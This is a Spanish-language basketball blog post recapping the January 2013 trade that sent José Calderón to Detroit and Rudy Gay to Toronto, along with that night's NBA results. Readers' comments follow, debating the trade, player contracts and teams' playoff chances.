La Crónica: Calderon a Detroit

31 de January de 2013 por Simon

Ayer se oficializó el traspaso que todos llevábamos tiempo esperando. Memphis se deshizo de Gay, que va a parar a Toronto. A Memphis llega Ed Davis desde Raptors y Daye y Prince desde Detroit. A Detroit se marcha nuestro José Calderón, aunque no tenemos claro el futuro de Calderón en este equipo. También anoche se anunciaron los participantes del Rising Star Challenge ese partido, que desde el año pasado tiene todavía menos fuste que antes cuando enfrentaba a Rookie y Sophomores. Se confirmó que no estará Rubio como era de esperar tras sus problemas de rodilla. En lo que respecta a la jornada de ayer apenas destaca  la derrota Lakers en Arizona, el resto de partidos marcharon según el guión previsto.

Lakers salió derrotado de manera totalmente inesperada ante Phoenix (86-92).  EL partido transcurrió con el mismo guión de los últimos 3 partidos amarillos con Kobe haciendo de general para repartir juego e involucrar a todos los compañeros. De esta manera las ventajas no tardaron en llegar pero en el último cuarto y con una ventaja que llegó a los 13 puntos, los californianos desaparecieron completamente de la cancha, nada más se supo de ningún jugador angelino. Recontamos: 7 pérdidas (algunas bochornosas), 13 puntos en el último cuarto, Howard lesionado, Kobe desacertadísimo… Mientras tanto Phoenix se encontró con un equipo que tras dominarlo tres cuartos le regaló el partido en el último. Beasley demostró el talento que la gente dice que tiene para acabar con 27 puntos de los cuales 10 fueron en el período definitivo. Este apagón no debería afectar demasiado a Lakers. El juego fue bueno hasta ese momento y si quieren alcanzar los Play Off este es el único camino, pero ojo, pues no le quedan ya muchas oportunidades para andar dejándose partidos tontos antes equipos de la zona baja. Pinta feo lo de Howard. Quizá no sea gran cosa y vuelva a jugar pronto, pero cada partido da claros síntomas de que ese hombre no está nada sano. Cada vez que recibe un golpe ahí o se ve obligado a forzar se nota que le duele mucho y lo incapacita en muchos movimientos. 

New York, en cambio, consiguió una nueva victoria ante Orlando en un partido igualado que se rompió a favor de Knicks a inicios del último cuarto (97-113). Todos los jugadores de New York estuvieron a un gran nivel, destacando el 10/11 en tiros de campo de Chandler a los que añadió 5 asistencias y 7 rebotes. 6 jugadores en dobles dígitos y Carmelo batiendo el récord de la franquicia de partidos consecutivos anotando 20 o más puntos.  En Orlando JJ Redick estuvo espectacular pero no fue suficiente para plantar cara a Orlando. Sin duda es uno de los nombres que nos encantaría ver en el concurso de triples.

Miami venció sin problemas a Brooklyn y es que cuando el Big Three está tan enchufado como ayer es complicado meterle mano a los Heat. Anoche los 3 jugadores tiraron bastante y los 3 por encima del 50% de acierto. El mejor como siempre fue Lebron James que acabó con 24 puntos, 9 rebotes y 7 asistencias nada del otro mundo para él, impresionante. Deron Williams y Joe Johnson siguen sin estar del todo finos esta temporada y ayer se notó y fue la clave para que Brooklyn no pudiera mantener el ritmo de los campeones (105-85).

Clippers se aprovechó del mal momento de Timberwolves que ya tienen la temporada echada, lo que hace que su único objetivo se haya quedado en buscar una buena posición de Draft a la espera de que la temporada que viene les traiga menos contratiempos y puedan finalmente despegar. Clippers sigue capeando el temporal y mantienen como pueden la persecución a los líderes del Oeste a pesar de la baja de Chris Paul. Blake Griffin está demostrando ser capaz de liderar al equipo sin Paul y anoche lo hizo con 26 puntos y 13 rebotes (96-90).

Otro equipo del que no se habla mucho pero están demostrando ser capaces de estar en los puestos de honor de la liga son Denver Nuggets. Su comienzo dubitativo debido a un calendario terrible nos hizo creer que estaban peor pero ya están prácticamente igualados a Golden State en el quinto puesto del Oeste. No descarten que acaben llevándose la ventaja de campo en primera ronda si los nuevos no se adaptan rápido en Memphis. Anoche la víctima fue Houston Rockets en un partido jugado a toda pastilla que terminó 110-118. El mejor Nugget fue Gallinari con 27 puntos pero fueron 5 los jugadores en dobles dígitos de anotación.  Buen partido del quinteto Rockets pero no fue suficiente ante un equipo en racha.

Toronto sin Calderón cayó ante Atlanta por un solo punto (92-93) dando un auténtico clínic de cómo no se puede jugar una última posesión. Aún así y sin ser ningún experto veo en la última jugada unos posibles pasos y unas cuantas faltas…  pero ya saben lo que pasa aquí en la NBA.  Utah en general y Millsap en particular se redimieron de la bochornosa derrota ante Houston de hace unos días venciendo a New Orleans Hornets 99-104. Millsap acabó con 25 puntos y 10 rebotes. Por parte de NOLA Vásquez se marcó un buen partido una noche más y terminó con 17 puntos y 13 asistencias.  Sixers venció a Washington Wizards a pesar de la gran noche, una vez más en los últimos tiempos, de Emeka Okafor (84-92).

Terminamos con una ronda de palizas. En primer lugar tenemos a los líderes de la liga, San Antonio Spurs dando una buena tunda a Charlotte Bobcats (78-102) con un Tony Parker impresionante que anotó 9 de sus 10 tiros que realizó anoche para terminar con 22 puntos. Chicago, cada vez más cerca de Knicks venció con comodidad a Bucks con el pequeñín Nate Robinson a la cabeza (104-88). Indiana no tuvo piedad de Detroit  (79-98) y no les dieron ni la mínima opción de victoria gracias a un gran partido de Hibbert con 18 puntos y 11 rebotes. Una noche más la defensa de Pacers fue impresionante. Mal equipo en el que ha caído José Calderón, la mejor salida para la seria que lo cortaran y poder escoger equipo. Por último, Boston superó el shock de perder a Rondo toda la temporada apalizando a Sacramento (81-99) con un doble doble del discutido Paul Pierce  que ya ha dicho que no quiere salir de Boston, así que vayan buscando otro candidato a ser traspasado.

PREMIOS

MVP: Día de muchos partidos y buenas actuaciones. Al Horford se fue al vestuario con 22 puntos, 10 rebotes, 6 asistencias y 3 tapones; Blake Griffin, con 26 puntos, 13 rebotes y 3 robos; Lebron James se quedó cerca del triple-doble con 24 puntos, 9 rebots y 7 asistencias, y Tyson Chandler, a pesar de sus molestias, se fue a los 21 puntos, 7 rebotes y 5 asistencias. Premios para el dominicano de los Hawks que anotó un mate a falta de 22 segundos y colocó dos gorros en los últimos 15 segundos de partido.

Sorpresa: Resurrección de Michael Beasley ante un rival de empaque como los Lakers. El jugador de los Suns anotó 27 puntos, 6 rebotes y 5 robos. Nate Robinson se disfrazó de Rose y acabó con 24 puntos y un 9 de 11 en tiros de campo. Danny Green jugó un partido completísimo, 17 puntos, 5 rebotes, 2 asistencias, 3 robos y 2 tapones.

Decepción: Demarcus Cousins pasa por una crisis en toda regla. Ayer consiguió 13 puntos, 6 rebotes y 4 asistencias, pero no estuvo fino de cara a canasta (4 de 12) y perdió 5 balones. Lo del último cuarto de los Lakers también es de juzgado de guardia.

Esfuerzo en vano: Pocas grandes actuaciones se han quedado sin recompensa. En todo caso la de JJ Redick que anotó 29 puntos (9 de 14) insuficientes ante el poderío de los Knicks.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

44 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De anoche he visto el Heat vs Nets. Dos cuartos igualados para luego un parcial de 32-5 que acabó con el encuentro en el tercer periodo. Por los Heat muy buen partido de Wade acompañando al siempre intratable LeBron y buenas sensaciones de equipo dando la impresión de ganar con facilidad. Buen partido de Birdman Andersen que puede dar minutos interesantes por dentro. Brooklyn no dio señales de los buenos resultados que está obteniendo con un Deron Williams desacertado en el tiro y sólo Brook Lopez haciendo realmente dañó a los Heat. Parecen lejos de Miami.
    Del resto, destacar la paliza de Boston en su primer partido sin Rondo y el batacazo de los Lakers. No se pueden permitir perder partidos así si pretenden llegar a los PO. Lo de Howard muy preocupante ya que no acaba de arrancar y parece encadenar un problema tras otro. Les quedan ahora otros 6 partidos seguidos fuera y tienen que ganar al menos la mitad o estarán definitivamente en el hoyo.

      Citar

  2. GreenPride dice:
    #2

    Del trade de Calde-Gay
    Está claro que Memphis con su nuevo propietario no está dispuesto a pagar impuesto de lujo aún a costa de empeorar claramente el equipo. Sólo así se entienden los movimientos que está haciendo quitando primero a Speights y Ellington de la plantilla y deshaciéndose ahora de Gay. Una lástima que el vil metal nos vaya a dejar cojo a uno de los equipos animadores en el Oeste ya que tras esos dos movimientos el equipo parece peor de lo que era.
    En cuanto a Calde sólo le queda intentar hacer números para ver si al final de temporada puede negociar un buen contrato como free agent.
    Los Pistons ni ganan ni pierden mucho y Toronto en principio gana bastante con la llegada de un anotador que pueda liderar el equipo y facilitar el intento de traspaso de Bargnani.

      Citar

  3. Jose Luis dice:
    #3

    Yo creo que Howard debería descansar en los partidos contra equipos por debajo del 0.500… si lo pierdes, pues ya está bastante mal que los pierdas sin Howard, pero si los ganas y se te va lesionando o no recuperando… un mal golpe a final de temporada o en PO (si llegasen) te deja sin nada que hacer. Yo lo descansaría en partidos así, tienen que ganarlos sin él y acostumbrarse… y que Howard pueda descansar algo y recuperarse.

      Citar

  4. Jose Luis dice:
    #4

    Y por cierto, veo fuera de play-offs a Memphis como no encajen muy bien las piezas… o al menos, a su casa en 1ª ronda lo veo casi seguro. A ver como está Prince, su última oportunidad de hacer algo. Y tampoco entiendo mucho lo de Speights por Davis, salvo que hiciera falta meter a Davis en el trade para cuadrar salarios y esas cosas, aparte de que el futuro de este se supone mayor que el de Speights.

      Citar

  5. Moloneador dice:
    #5

    Detroit gana en espacio salarial de cara a este verano, 20 millones de los expirings de Calderon y Maguette, 21 millones del contrato de Prince y 4 de Daye fuera, además Maxiell y Bynum terminan contrato también, son otros 8 millones, si Villanueva no ejerce su player option son otros 9 millones, si la ejerce, amnistiarle. vamos que se plantan con 40 millones para fichar FA teniendo como base del proyecto a Knight, Monroe y Drummond, más Jerebko y Singler de complementos. Stuckey el próximo año acaba contrato también y son otros 8 millones, muchísimo dinero en dos veranos, si fichan inteligentemente pueden volver a la élite para la 14/15.

    PD: Calderon debería asegurarse un contrato de 3-4 millones por un par de años en un contender e ir a por el anillo. Miami, Thunder, incluso Clippers al terminar los contratos de Billups y Bledsoe. Si es listo hara eso, si vuelve a pegar el palo de un ultimo gran contrato, ir a por otros diez millones esta claro que definitivamente sera del club del cazo mix.

      Citar

  6. Jose Luis dice:
    #6

    Los Raptors, pf. Muchos millones empleados en DeRozan, Gay, Fields, BARGNANI… No sé, les falta un especialista de fuera, quizá Ross sea su hombre. Ahora mismo no veo minutos suficientes para Gay, DeRozan, Fields y Ross. En el interior se han quedado sólo con Amir Johnson y Valanciunas (bueno, y la nueva promesa Aaron Gray).

    También puede que en algunos momentos Rudy Gay juegue de 4… pero a menos que te llames LeBron James, si juegas de 4 siendo un 3 debes tener un tiro exterior bastante bueno, y Gay no lo tiene.

      Citar

  7. Jose Luis dice:
    #7

    Por lo visto Colangelo sigue interesado en hacer trades, cuyo objetivo sería soltar a Bargnani, pero que si no encuentra nada interesante (vamos, algo más que un chupa-chups xD) no habrá traspaso.

    Ahora en serio, no sé qué esperan sacar por Bargnani, y no creo que quieran meter a ningún joven en el traspaso… ¿qué equipo va a querer a Bargnani? Equipos que quieran un 4 abierto, pero con un contrato así de largo… pf

      Citar

  8. Jose Luis dice:
    #8

    Y veo a los Raptors como siempre… juntando jugadores que parece pueden explotar y llevarlos a una 2ª ronda, y que después pueden quedarse en nada… Gay es un gran alero, pero no es un all-star. Lo mismo DeRozan. Lo mismo Lowry. Lo mismo Bargnani o Valanciunas. Fields… muchos jugadores, cobrando mucho, y que quizá les lleven a una primera ronda… No creo que sea tanta culpa del GM como de que ésta franquicia está en Canadá y nadie quiere ir allí. Y para colmo se libran de Ed Davis, que estaba contentísimo de estar en Toronto. Al enterarse del traspaso,se rasgó la camiseta en el vestuario, subió a las oficinas a encararse con los directivos, se fue con una toalla en la cabeza… “ni la música puede alegrarme ahora” mientras andaba cabizbajo con los auriculares en la mano…

      Citar

  9. Denise dice:
    #9

    Jose Luis: Y veo a los Raptors como siempre… juntando jugadores que parece pueden explotar y llevarlos a una 2ª ronda, y que después pueden quedarse en nada… Gay es un gran alero, pero no es un all-star. Lo mismo DeRozan. Lo mismo Lowry. Lo mismo Bargnani o Valanciunas. Fields… muchos jugadores, cobrando mucho, y que quizá les lleven a una primera ronda… No creo que sea tanta culpa del GM como de que ésta franquicia está en Canadá y nadie quiere ir allí. Y para colmo se libran de Ed Davis, que estaba contentísimo de estar en Toronto. Al enterarse del traspaso,se rasgó la camiseta en el vestuario, subió a las oficinas a encararse con los directivos, se fue con una toalla en la cabeza… “ni la música puede alegrarme ahora” mientras andaba cabizbajo con los auriculares en la mano…

    Jaja, lo de Ed Davis te lo has inventado o es verdad…
    Yo peinaría el mercado intentando traspasar en un pack a Bargnani y De Rozan, si no, quitarse de en medio al menos a De Rozan. Con la llegada de Gay, su presencia me sobra en el equipo.

      Citar

  10. melo15 dice:
    #10

    Es justo lo que yo pienso.
    Estaba claro que Toronto tenia que hacer algun movimiento, porque necesitaba alguien que cerrara los partidos igualados y eso, pero no a costa de quedarse sin juego interior. Eso es lo que no entiendo porque Bargnani no es lo que necesita ahora Toronto y ademas Ed Davis lo estaba haciendo francamente bien. Por otro lado tampoco Valanciunnas es un pivot de confianza ahora mismo.
    En resumen Toronto tiene demasiados aleros y poco juego interior y Memphis al reves.
    Yo no entiendo porque no le han dado a Memphis a Terrence Ross por ejemplo, en canvio se quedan con dos aleros no tiradores y un pareja de pivots que no transmite confianza
    Y Memphis lo mismo, para que necesitas muy buenos recambios para tu pivots si ya tienes dos que son muy buenos, no seria mejor reforzar el perimetro.

    PD: Se entenderia mas si los Raptors traspasaran a Bargnani y algo mas por buen ala-pivot.

      Citar

  11. Pop dice:
    #11

    Desde luego el gran beneficiado de todo es Detroit. Las oportunidades de reconstrucción en un par de temporadas son muy muy buenas. En cambio lo de los Grizzlies es una pena, es un cambio evidentemente forzado por las circunstancias económicas. El quinteto de los osos se va resentir bastante, me temo. De Toronto no hablamos, llevan en la misma situación muchos años y esto no cambia casi nada.

      Citar

  12. Esteban dice:
    #12

    a mi me gusta y mucho lo de los raptors, vamos a ser sinceros, nadie quiere ir a canada, coilangelo hace lo que puede llevando jugadores mendiante trades, de otra forma no irian

    veo a lowry como un gran base, a derozan y ross como interesantisimos aleros, a gay como un hombre que puede liderar uin equipo como lo hacia en menphis antes de la llegada de z-bo, mas protagonismo, bargnani al lado de esos 3 con muchas menos responsabilidades puede rendir, y valanciunas debeia convertirse en un centro mas que legitimo de la liga

    repito, me gusta y mucho, si no hay grandes egos y todos tiran lo que corresponde y juegan para ganar no par ahacer numeros, veo un muy buen equipo

      Citar

  13. Esteban dice:
    #13

    se dice que podrain cambiar a bargnani, pero yo me lo quedaria, los contratos que sobran en canada, son los de fields (un disparate de contrato) , el de amir jhonson y el de keliza

    habria que preocuparse por sacar alguno de esos y no al italiano

      Citar

  14. Esteban dice:
    #14

    perdon, esta es la misma pagina donde siempre se dijo que menphis jugaba mejor sin GAY q con GAY?

    hace mas de un año que se viene reclamando un trasapaso por rudy gay y ahora que menphis lo hace todos estan enojado

    QUIEN LOS ENTIENDE JODER!

      Citar

  15. Jose Luis dice:
    #15

    @Denise

    La reacción de Ed Davis al enterarse que iba a ser traspasado fue totalmente distinta. Fuentes informan que Davis subió las escaleras del complejo y entró en las oficinas de los Hawks donde se encontraban todos los directivos de los Raptors para que le dieran explicaciones. “Cuando Davis bajo a despedirse de sus compañeros estaba tan furioso que se desgarro la camiseta y entró en el vestuario con un cabreo monumental, (…) salió del vestuario 10 minutos más tarde con una toalla en la cabeza y los auriculares en la mano.” Davis dijo que ‘estaba tan triste que no quería ni escuchar música’.

    Pobre Ed…

      Citar

  16. GreenPride dice:
    #16

    Jose Luis, los Lakers están sin margen para dar descansos a Howard en ningún partido. Tienen que ir a ganar todos los partidos que puedan para intentar llegar a PO si no quieren ser el mayor fracaso que ha conocido el deporte profesional en muuuuuchos años. Por tanto nada de reservar gente, a tope mientras s

      Citar

  17. GreenPride dice:
    #17

    Jose Luis, los Lakers están sin margen para dar descansos a Howard en ningún partido. Tienen que ir a ganar todos los partidos que puedan para intentar llegar a PO si no quieren ser el mayor fracaso que ha conocido el deporte profesional en muuuuuchos años. Por tanto nada de reservar gente, a tope mientras se pueda y cuando el cuerpo no aguate pues a descansar, pero forzado no porque el rival esté por debajo del .500

      Citar

  18. Jose Luis dice:
    #18

    Esteban, quizá esperásemos un 2 tirador o un 3 más tirador. Me explico, un pack (por ejemplo) de un jugador como afflalo y otro como Parsons o algo así (quizá con Parsons me he pasado) pero algo más de tiro exterior… Daye tiene en su carrera un 35% (aunque este año ha tirado pocos y tiene un 52%, porcentaje que no va a mantener). Prince está en un 43%, bastante bien para él.

    Bueno, quizá los nombres echen un poco para atrás, pero parece un buen trade para Memphis. No obstante, si la ofensiva Grizzlies ya tenía problemas… dudo que sigan al mismo nivel. Pero todo hay que verlo.

      Citar

  19. Moloneador dice:
    #19

    Esteban, lo que pasa es que primero decidieron dejar ir a OJ Mayo, por lo que se suponía que confiaban todo el peso de anotación exterior en Rudy Gay, traspasan a Ellington (unico exterior tirador de la plantilla) y luego a Gay por un Prince cuyo rendimiento esta por ver, pero que jamas de los jamas fue un anotador y en estos momentos de su carrera menos, así que o Marc y Zach suben a 25 puntos por partido cada uno y Bayless se convierte en OJ Mayo o solo podrán ganar dejando a sus rivales en 70 puntos.

    Todo viene de que el nuevo dueño no quiere aflojar la pasta, me parece correcto, pero la critica sigue siendo logica cuando malvendes a tu “estrella”, dejas ir a tu anotador, traspasas medio banquillo para reducir salarios, etc, etc.

      Citar

  20. Jose Luis dice:
    #20

    ¿Tan grave es la lesión que tiene Howard que requiere de más de dos semanas para recuperarse casi entera? Como siga así… cualquier golpe malo que lo pierdan un mes o más, es adiós. No sé. Por lo pronto van 1-1 en estos 8 partidos que eran cruciales, para mí deberían quedar mínimo 5-3… y aún visitan Miami, Brooklyn y Boston…

      Citar

  21. Esteban dice:
    #21

    yo no creo que pierdan tanto con la partida de gay, si les vendria bien otro trade por un anotador, pero zach ya ha cargado con el peso ofensivo de este equipo sin gay y puede volver a hacerlo

    tambien marc debera tener mas jugadas para el

    recuerden cuando se fueron green y kistic del thunder, que entre ambos promediaban 26 puntos por partidos y llego perkins que promedio 5 esa temporada, el vacio de anotacion llego por otro lado, algunos tiros mas de westbrook y durant y la explosion de harden e ibaka

    bueno aca van a necesitar algunois tiros mas de zach y marc, e intentar que conley, anote algo mas tambien

    ojo que davis puede ser un factor tambien viniendo desde el banco

      Citar

  22. Ruxixón dice:
    #22

    En el traspaso de Speights & cia la prensa dijo que con este movimiento se aseguraba que Rudy Gay acababa la temporada de los Grizzlies.A mí me parecía extraño que fuera así,primero porque Robert Pera había dejado claro que primaba el regimen salarial por encima de todas las cosas y segundo porque el equipo se quedaba muy corto.Así que el traspaso no me pilla por sorpresa,si los jugadores que reciben.A priori no palian el déficit de tiro exterior,Prince no me parece un jugador que sea una máquina en ese aspecto y Daye es un jugador cortado por el mismo patrón de Prince.Eso si,a nivel defensivo el equipo no pierde nada,y Ed Davis me parece un jugadorazo.Dudo mucho que traspasen a Randolph ahora mismo,no lo tengo tan claro para el verano y creo que será el próximo jugador en salir de allí.

    Colangelo quiere salvar su culo fiándose a los nombres y no a la cohesión del equipo,para mí son incompatibles Lowry-DeRozan-Rudy Gay,y desperdicias a Ross y a Fields,a no ser que Gay juegue de 4 como alguno apuntáis aquí,que es una opción plausible.Bargnani tiene los días contados en Toronto.

    Y Detroit gana y mucho,quizás no tenga sentido lo de Calde más allá del buyout,pero para mí es un jugador que se puede adaptar bien a los Pistons.No encaja si quieres darle proyeccióna Brandon Knight pero para nutrir a Monroe y Drummond,el español es un filón.Al margen de eso es evidente que se han deshecho de contratos que no tenían ningún sentido para ellos.Ganadores del traspaso,

      Citar

  23. rumbero dice:
    #23

    A mi me da que eso de que ahora Marc y Z-Bo van a ser el pilar ofensivo nada de nada, estoy con lo que comentaba Denise en el otro post y lo de Ed Davis suena a recambio de Randolph tarde o temprano…y a ver que sacan por él que pueda complementar el perímetro. Es una lástima, pero parece que es como se van a mover desde Memphis a partir de ahora. Y lo de Detroit suena realmente bien, otra cosa es que a Dumars se le crucen los cables y en algun momento firme a un par de Villanuevas de la vida…capaz es

    No me explicaba la derrota de los Lakers en Phoenix hasta que he visto la camiseta con la que jugaban ayer los Suns. No se puede perder con una camiseta tan molona.

      Citar

  24. Denise dice:
    #24

    El problema de Memphis ya no es que se vaya Rudy Gay, es que te quedas sin una referencia anotadora en el exterior y los aleros rivales se cerraran mas sobre Zach & Marc haciendoles mas 2×1.

    Ed Davis me parece un gran jugador, pero pienso que ya que lo adquieres, hubiera sido mejor traspasar a Zach Randolph, es decir, quizas los tiros deberían haber ido traspasando a Zach para hacerse con Ed Davis y algun otro ala-pivot de un tercer equipo en el traspaso.

      Citar

  25. Denise dice:
    #25

    Denise: El problema de Memphis ya no es que se vaya Rudy Gay, es que te quedas sin una referencia anotadora en el exterior y los aleros rivales se cerraran mas sobre Zach & Marc haciendoles mas 2×1.Ed Davis me parece un gran jugador, pero pienso que ya que lo adquieres, hubiera sido mejor traspasar a Zach Randolph, es decir, quizas los tiros deberían haber ido traspasando a Zach para hacerse con Ed Davis y algun otro ala-pivot de un tercer equipo en el traspaso.

    Se me cortó…

    Ya que ahora tienes una muy buena pintura con Zach, Marc, Ed y Arthur, y una línea exterior fenomenal para la defensa pero muy pobre para el ataque.
    Traspasando a Zach y dejando a Gay hubiesen tenido mayor equilibrio en sus lineas

      Citar

  26. Ruxixón dice:
    #26

    3 apuntes:

    – Popovich dirigirá al combinado del oeste en el All Star de Houston,debe dar palmas con las orejas.Stern debe estar preocupado Spor si le da por que no jueguen los titulares y que si lo hagan los suplentes,jajaj-

    – Jimmy Butler,ojito a este chico,lleva una temporada muy buena,recibiendo galones del mister,cubriendo holgadamente la baja de Deng y asumiendo la responsabilidad de marcar al mejor exterior rival la mayoría de las veces.Ni que decir tiene que lo de Chicago este año es espectacular,3º del este sin Rose.

    – Con lo de Gay se da la salida a la vorágine de traspasos,veremos algo gordo de aquí a un mes ¿? Monta Ellis,Josh Smith,Cousins….mucho nombre que está en el alero.Disfruto como un enano esta época.

      Citar

  27. Simon dice:
    #27

    Oye nadie se ha parado a pensar en que los mejores Grizzlies de la historia los hemos visto sin Gay y con battier ocupando el puesto de 3??? Battier y Prince son dos jugadores del mismo corte Battier mas tirador y prince mas capacitado ( aunque no es nada del otro mundo ) para crearse su propio tiro. Ademas Prince en situaciones de Catch And Shot es un tirador bastante bastante bueno. No se… de primeras el traspaso me parecia malisimo en lo deportivo pero sin Prince rinde como se espera los Grizzlies van a seguir siendo muuy peligrosos. Lo unico es que es verdad que ahora si que no tienen a nadie para crearse su propio tiro desde fuera.

      Citar

  28. Moloneador dice:
    #28

    Simon:
    Oye nadie se ha parado a pensar en que los mejores Grizzlies de la historia los hemos visto sin Gay y con battier ocupando el puesto de 3??? Battier y Prince son dos jugadores del mismo corte Battier mas tirador y prince mas capacitado ( aunque no es nada del otro mundo ) para crearse su propio tiro. Ademas Prince en situaciones de Catch And Shot es un tirador bastante bastante bueno.No se… de primeras el traspaso me parecia malisimo en lo deportivo pero sin Prince rinde como se espera los Grizzlies van a seguir siendo muuy peligrosos.Lo unico es que es verdad que ahora si que no tienen a nadie para crearse su propio tiro desde fuera.

    Pero entonces tenían a OJ Mayo saliendo desde el banquillo y no a Bayless

      Citar

  29. nba dice:
    #29

    La pregunta deberia ser, quien va a distribuir el balon en Toronto …

      Citar

  30. Esteban dice:
    #30

    Denise:
    El problema de Memphis ya no es que se vaya Rudy Gay, es que te quedas sin una referencia anotadora en el exterior y los aleros rivales se cerraran mas sobre Zach & Marc haciendoles mas 2×1.

    Ed Davis me parece un gran jugador, pero pienso que ya que lo adquieres, hubiera sido mejor traspasar a Zach Randolph, es decir, quizas los tiros deberían haber ido traspasando a Zach para hacerse con Ed Davis y algun otro ala-pivot de un tercer equipo en el traspaso.

    aunque no lo creas, gay es mas traspasable que randolph, no solo por ser mas joven y da una sensacion de que tienes un anotador a largo plazo, sino tambien porque se especula que no ha tocado su techo, y que en otro equipo podria hacerlo y ser un tio de 25 o 26 puntos por juego, calidad tiene, es largo y tiene un tiro genial, habra que ver si puede ser ese jugador o no

    randolph no solo es mas viejo (y bastante), y solo es para ganar AHORA, ningun equipo que este pensando medianamente a futuro querria a el en el equipo, mas alla de que despues de su lesion no volvio a ser el jugador determinante que acribillo a los spurs hace un par de temporadas

    y recordemos que en cada lugar donde jugo el bueno de zach tuvo no uno sino miles de problemas, en MENPHIS encontro su casa, no creo que nadie este muy interesado en apostar que se adaptara bien

    muchos creen y me incluyo que la mejora en el nivel de zach, esta vinculada a jugar con gasol, con otro al lado que no sea noah, chandler, howard o garnett no lo veo funcionando mucho

    vendieron al mas caro, y esta bien

      Citar

  31. Esteban dice:
    #31

    Simon:
    Oye nadie se ha parado a pensar en que los mejores Grizzlies de la historia los hemos visto sin Gay y con battier ocupando el puesto de 3??? Battier y Prince son dos jugadores del mismo corte Battier mas tirador y prince mas capacitado ( aunque no es nada del otro mundo ) para crearse su propio tiro. Ademas Prince en situaciones de Catch And Shot es un tirador bastante bastante bueno.No se… de primeras el traspaso me parecia malisimo en lo deportivo pero sin Prince rinde como se espera los Grizzlies van a seguir siendo muuy peligrosos.Lo unico es que es verdad que ahora si que no tienen a nadie para crearse su propio tiro desde fuera.

    es cierto y ya lo dije, tambien es cierto que zach jugo como nunca lo volvio a hacer esa temporada, por lo que necesitan al zach MVP de esos años para ser igual de buenos

    por otro lado, alguien recuerda como terminaron los grizzlies el año pasado con mejor equipo que el de este año? sumenle los jugadores traspasados hace unas semanas mas o.j. MAYO y el propio GAY, quedaron fuera en primera ronda, y si bien podrian haber pasado, no tenian con que afrentarse a los spurs ni de coña y mucho menos al thunder

    el dueño a visto un equipo carisimo, bueno pero carisimo, atado en sus contratos por un par de años, lo suficientemente buenos para finalistas del este pero no para semifinalistas del oeste y decidio reconstruir

    algo parecido hizo jordan en los bobcats, no le ha salido nada bien, pero ese equipo de jackson, chandler, wallace, felton, etc no iba mas que a primera ronda y valia fortunas, asi que lo desarmo

      Citar

  32. Denise dice:
    #32

    Se confirma la baja de Glen Davis para el resto de temporada, vamos directos al nº1 del Draft ya que pocas victorias más vamos a sumar, pero las sensaciones que me transmite el equipo son muy pero que muy buenas. Gran trabajo el de Vaugh sacando adelante el equipo con mucha dignidad, mentalmente no se ha notado el trauma post-Howard, el equipo da la cara, compite, juega alegre, no baja los brazos y con un pelín de suerte podría llevar 6-8 victorias más que se han escapado en los instantes finales. Todo ello con plaga de lesiones importantes incluidas.
    En reusmen, gran trabajo el de Vaughn y ahora le toca al nuevo GM el dejar de hacer las cagadas de su predecesor, e intentar al menos liberarse de algunos contratos basura.

      Citar

  33. Esteban dice:
    #33

    denise tu que sabes mas que hispanosnba, los contratos de harrington y turkoglu tienen contratos garantizados el proximo o no? en hispanosnba ponen que no estan garantizados

    eso si que seria bueno

      Citar

  34. Denise dice:
    #34

    Esteban: denise tu que sabes mas que hispanosnba, los contratos de harrington y turkoglu tienen contratos garantizados el proximo o no? en hispanosnba ponen que no estan garantizadoseso si que seria bueno

    Turkoglu tiene una Player Option de 12 millones el año que viene que la va a ejecutar si o sí…ya que estimo que ahora mismo no habría nadie que le pagara mas de 3 millones. Harrington tiene contrato garantizado hasta la 2015 por mas de 7 millones anuales.
    El margen de maniobra de Orlando no es el ideal, y estimo que el año que viene será otro año de transición, para que los rookies se fogueen. Recuerda que tras la amnistía de Arenas, están muy por debajo del limite salarial, pero el unico agente libre importante que veo es Monta Ellis, y Orlando aun debe pagarle a Arenas 22 kilos el año que viene por estar sentado en su casa. Por lo que no veo a Orlando apostando fuerte este verano en el mercado de agenets libres.

      Citar

  35. Jose Luis dice:
    #35

    ¿Y qué te parece el hecho de que no parece que vayan a traspasar a JJ Redick? ¿No hay nada potable que puedan sacar por él? Cualquier primera ronda o jugador joven con dudoso potencial ya valdría.

      Citar

  36. txusma dice:
    #36

    Pq cuanto tiene pensado pedir JJ en el próximo contrato? Se está destapando, por fin, como un jugador más que válido.

      Citar

  37. Esteban dice:
    #37

    orlando no debe renovar a jj

    mientras el equipo jugaba PO ha sido un jugador mediocre, del monto, de rol de tirador y no mas que eso

    este año que el equiipo es una banda se destapa y mete de todos lados, inflando sus estadisticas

    ya esta claro que para un equipo ganador jj redick no hace ninguna diferencia, pero puede hacer numeros en derrotas de su equipo

    para mi gusto no vale mas que la exepcion de nivel medio, 5 o la de 3 q tenga algun aspirante

      Citar

  38. Denise dice:
    #38

    Yo no renovaría a JJ Redick por el mismo contrato que tiene actualmente (3 temporadas por 20 millones) y mucho menos por uno superior. Es un buen jugador, pero su mejor rol es el de 6º hombre, y ya bastantes contratos largos y costosos tiene Orlando como para pagarle 7 kilos a un 6º hombre.

      Citar

  39. Denise dice:
    #39

    Jose Luis: ¿Y qué te parece el hecho de que no parece que vayan a traspasar a JJ Redick? ¿No hay nada potable que puedan sacar por él? Cualquier primera ronda o jugador joven con dudoso potencial ya valdría.

    Hombre, yo intentaría un Monta Ellis por Afflalo y Redick, otra cosa es que los Bucks lo aceptaran. Pero creo que no sería mala opción para ambos.

      Citar

  40. Jose Luis dice:
    #40

    Mmm dos escoltas que apenas pueden jugar de aleros, aunque Redick puede ejercer como base en ciertos momentos, no está mal, dependiendo de si Redick renovaría o no en Bucks, y lo que los Bucks quieran. Pero me parece bastante interesante, aunque tampoco creo que Ellis quiera renovar en Orlando, la verdad.

      Citar

  41. Denise dice:
    #41

    Jose Luis: Mmm dos escoltas que apenas pueden jugar de aleros, aunque Redick puede ejercer como base en ciertos momentos, no está mal, dependiendo de si Redick renovaría o no en Bucks, y lo que los Bucks quieran. Pero me parece bastante interesante, aunque tampoco creo que Ellis quiera renovar en Orlando, la verdad.

    Ya pero Bucks se haría con Afflalo que es un decente escolta y con 7 millones del expiring de Redick. A los Magic le vendría bastante bien un 2 anotador y que pueda jugarse bolas en los instantes finales del partido. Y aunque Monta no renovase, conseguiría librarse del largo contrato de Afflalo.

      Citar

  42. Esteban dice:
    #42

    afflalo y su contrato no es el problema de orlando, al contrario, es un exelente conmtratao dado su rendimiento

    el problema de orlando son los contratos de turkoglu, harrington, nelson, richarson y sobretodo la plata que le estan pagando a arenas

